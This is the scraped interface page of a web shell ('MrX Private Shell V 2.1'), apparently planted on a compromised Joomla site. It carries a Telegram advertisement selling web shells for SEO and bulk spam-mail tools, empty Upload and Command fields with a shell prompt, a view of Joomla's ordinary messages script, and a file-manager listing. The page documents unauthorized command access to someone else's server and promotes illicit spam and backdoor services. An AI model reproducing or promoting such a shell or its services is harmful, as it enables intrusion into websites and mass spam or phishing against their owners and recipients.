__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
class AlertElement extends HTMLElement{constructor(){super(),this.close=this.close.bind(this),this.destroyCloseButton=this.destroyCloseButton.bind(this),this.createCloseButton=this.createCloseButton.bind(this),this.onMutation=this.onMutation.bind(this),this.observer=new MutationObserver(this.onMutation),this.observer.observe(this,{attributes:!1,childList:!0,subtree:!0}),this.addEventListener("animationend",(t=>{"joomla-alert-fade-in"===t.animationName&&t.target===this&&(this.dispatchEvent(new CustomEvent("joomla.alert.shown")),this.style.removeProperty("animationName"))})),this.addEventListener("animationend",(t=>{"joomla-alert-fade-out"===t.animationName&&t.target===this&&(this.dispatchEvent(new CustomEvent("joomla.alert.closed")),this.remove())}))}static get observedAttributes(){return["type","role","dismiss","auto-dismiss","close-text"]}get type(){return this.getAttribute("type")}set type(t){this.setAttribute("type",t)}get role(){return this.getAttribute("role")}set role(t){this.setAttribute("role",t)}get closeText(){return this.getAttribute("close-text")}set closeText(t){this.setAttribute("close-text",t)}get dismiss(){return this.getAttribute("dismiss")}set dismiss(t){this.setAttribute("dismiss",t)}get autodismiss(){return this.getAttribute("auto-dismiss")}set autodismiss(t){this.setAttribute("auto-dismiss",t)}connectedCallback(){this.dispatchEvent(new CustomEvent("joomla.alert.show")),this.style.animationName="joomla-alert-fade-in",this.type&&["info","warning","danger","success"].includes(this.type)||this.setAttribute("type","info"),this.role&&["alert","alertdialog"].includes(this.role)||this.setAttribute("role","alert"),this.firstElementChild&&"BUTTON"===this.firstElementChild.tagName&&(this.button=this.firstElementChild,this.button.classList.contains("joomla-alert--close")&&this.button.classList.add("joomla-alert--close"),""===this.button.innerHTML&&(this.button.innerHTML='<span aria-hidden="true">&times;</span>'),this.button.hasAttribute("aria-label")||this.button.setAttribute("aria-label",this.closeText)),this.hasAttribute("dismiss")&&!this.button&&this.createCloseButton(),this.hasAttribute("auto-dismiss")&&this.autoDismiss()}disconnectedCallback(){this.button&&this.button.removeEventListener("click",this.close),this.observer.disconnect()}attributeChangedCallback(t,e,s){switch(t){case"type":(!s||s&&-1===["info","warning","danger","success"].indexOf(s))&&(this.type="info");break;case"role":(!s||s&&-1===["alert","alertdialog"].indexOf(s))&&(this.role="alert");break;case"dismiss":s&&""!==s||e&&""!==e?this.button&&"false"===s?this.destroyCloseButton():this.button||"false"===s||this.createCloseButton():this.button&&!this.hasAttribute("dismiss")?this.destroyCloseButton():!this.button&&this.hasAttribute("dismiss")&&this.createCloseButton();break;case"close-text":s&&s===e||this.button&&this.button.setAttribute("aria-label",s);break;case"auto-dismiss":this.autoDismiss()}}onMutation(t){for(const e of t)"childList"===e.type&&e.addedNodes.length&&this.button&&this.firstElementChild!==this.button&&this.prepend(this.button)}close(){this.dispatchEvent(new CustomEvent("joomla.alert.close")),this.style.animationName="joomla-alert-fade-out"}createCloseButton(){this.button=document.createElement("button"),this.button.setAttribute("type","button"),this.button.classList.add("joomla-alert--close"),this.button.innerHTML='<span aria-hidden="true">&times;</span>',this.button.setAttribute("aria-label",this.closeText),this.insertAdjacentElement("afterbegin",this.button),this.button.addEventListener("click",this.close)}destroyCloseButton(){this.button&&(this.button.removeEventListener("click",this.close),this.button.parentNode.removeChild(this.button),this.button=null)}autoDismiss(){const t=parseInt(this.getAttribute("auto-dismiss"),10);setTimeout(this.close,t>=10?t:3e3)}}customElements.get("joomla-alert")||customElements.define("joomla-alert",AlertElement);const getMessageContainer=t=>{let e;return t instanceof HTMLElement?t:(e=void 0===t||t&&"#system-message-container"===t?document.getElementById("system-message-container"):document.querySelector(t),e)};Joomla.renderMessages=(t,e,s,i)=>{const o=getMessageContainer(e);(void 0===s||s&&!1===s)&&Joomla.removeMessages(o),[].slice.call(Object.keys(t)).forEach((e=>{let s=e;const n=t[e],a=document.createElement("joomla-alert");["success","info","danger","warning"].indexOf(e)<0&&(s="notice"===e?"info":e,s="message"===e?"success":s,s="error"===e?"danger":s,s="warning"===e?"warning":s),a.setAttribute("type",s),a.setAttribute("close-text",Joomla.Text._("JCLOSE")),a.setAttribute("dismiss",!0),i&&parseInt(i,10)>0&&a.setAttribute("auto-dismiss",i);if(void 0!==Joomla.Text._(e)){const t=document.createElement("div");t.className="alert-heading",t.innerHTML=Joomla.sanitizeHtml(`<span class="${e}"></span><span class="visually-hidden">${Joomla.Text._(e)?Joomla.Text._(e):e}</span>`),a.appendChild(t)}const r=document.createElement("div");r.className="alert-wrapper",n.forEach((t=>{r.innerHTML+=Joomla.sanitizeHtml(`<div class="alert-message">${t}</div>`)})),a.appendChild(r),o.appendChild(a)}))},Joomla.removeMessages=t=>{const e=getMessageContainer(t),s=[].slice.call(e.querySelectorAll("joomla-alert"));s.length&&s.forEach((t=>{t.close()}))},document.addEventListener("DOMContentLoaded",(()=>{const t=Joomla.getOptions("joomla.messages");t&&Object.keys(t).map((e=>Joomla.renderMessages(t[e],void 0,!0,void 0)))}));

Filemanager

Name Type Size Permission Actions
fields Folder 0775
core-es5.js File 27.1 KB 0664
core-es5.min.js File 7.25 KB 0664
core-es5.min.js.gz File 3.01 KB 0664
core.js File 25.65 KB 0664
core.min.js File 7.49 KB 0664
core.min.js.gz File 3.08 KB 0664
draggable-es5.js File 6.11 KB 0664
draggable-es5.min.js File 2.09 KB 0664
draggable-es5.min.js.gz File 929 B 0664
draggable.js File 5.65 KB 0664
draggable.min.js File 2.39 KB 0664
draggable.min.js.gz File 969 B 0664
highlight-es5.js File 69.77 KB 0664
highlight-es5.min.js File 15.65 KB 0664
highlight-es5.min.js.gz File 5.5 KB 0664
highlight.js File 61.41 KB 0664
highlight.min.js File 14.13 KB 0664
highlight.min.js.gz File 5.23 KB 0664
index.html File 30 B 0664
inlinehelp-es5.js File 2.32 KB 0664
inlinehelp-es5.min.js File 714 B 0664
inlinehelp-es5.min.js.gz File 382 B 0664
inlinehelp.js File 2.1 KB 0664
inlinehelp.min.js File 647 B 0664
inlinehelp.min.js.gz File 359 B 0664
joomla-core-loader-es5.js File 8.35 KB 0664
joomla-core-loader-es5.min.js File 5.4 KB 0664
joomla-core-loader-es5.min.js.gz File 1.88 KB 0664
joomla-core-loader.js File 4.31 KB 0664
joomla-core-loader.min.js File 3.66 KB 0664
joomla-core-loader.min.js.gz File 1.16 KB 0664
joomla-hidden-mail-es5.js File 5.3 KB 0664
joomla-hidden-mail-es5.min.js File 2.65 KB 0664
joomla-hidden-mail-es5.min.js.gz File 1.1 KB 0664
joomla-hidden-mail.js File 2.14 KB 0664
joomla-hidden-mail.min.js File 1.32 KB 0664
joomla-hidden-mail.min.js.gz File 595 B 0664
joomla-toolbar-button-es5.js File 7.36 KB 0664
joomla-toolbar-button-es5.min.js File 3.51 KB 0664
joomla-toolbar-button-es5.min.js.gz File 1.36 KB 0664
joomla-toolbar-button.js File 3.07 KB 0664
joomla-toolbar-button.min.js File 1.69 KB 0664
joomla-toolbar-button.min.js.gz File 662 B 0664
keepalive-es5.js File 1.1 KB 0664
keepalive-es5.min.js File 429 B 0664
keepalive-es5.min.js.gz File 304 B 0664
keepalive.js File 1023 B 0664
keepalive.min.js File 577 B 0664
keepalive.min.js.gz File 311 B 0664
messages-es5.js File 16.88 KB 0664
messages-es5.min.js File 7.94 KB 0664
messages-es5.min.js.gz File 2.7 KB 0664
messages.js File 10.29 KB 0664
messages.min.js File 5.29 KB 0664
messages.min.js.gz File 1.66 KB 0664
multiselect-es5.js File 4.17 KB 0664
multiselect-es5.min.js File 1.94 KB 0664
multiselect-es5.min.js.gz File 686 B 0664
multiselect.js File 3.6 KB 0664
multiselect.min.js File 1.8 KB 0664
multiselect.min.js.gz File 645 B 0664
searchtools-es5.js File 19.29 KB 0664
searchtools-es5.min.js File 10.1 KB 0664
searchtools-es5.min.js.gz File 2.45 KB 0664
searchtools.js File 17.49 KB 0664
searchtools.min.js File 9.77 KB 0664
searchtools.min.js.gz File 2.42 KB 0664
showon-es5.js File 10.35 KB 0664
showon-es5.min.js File 3.47 KB 0664
showon-es5.min.js.gz File 1.24 KB 0664
showon.js File 9.41 KB 0664
showon.min.js File 3.35 KB 0664
showon.min.js.gz File 1.23 KB 0664
table-columns-es5.js File 6.71 KB 0664
table-columns-es5.min.js File 3.54 KB 0664
table-columns-es5.min.js.gz File 1.29 KB 0664
table-columns.js File 5.95 KB 0664
table-columns.min.js File 3.4 KB 0664
table-columns.min.js.gz File 1.24 KB 0664
Filemanager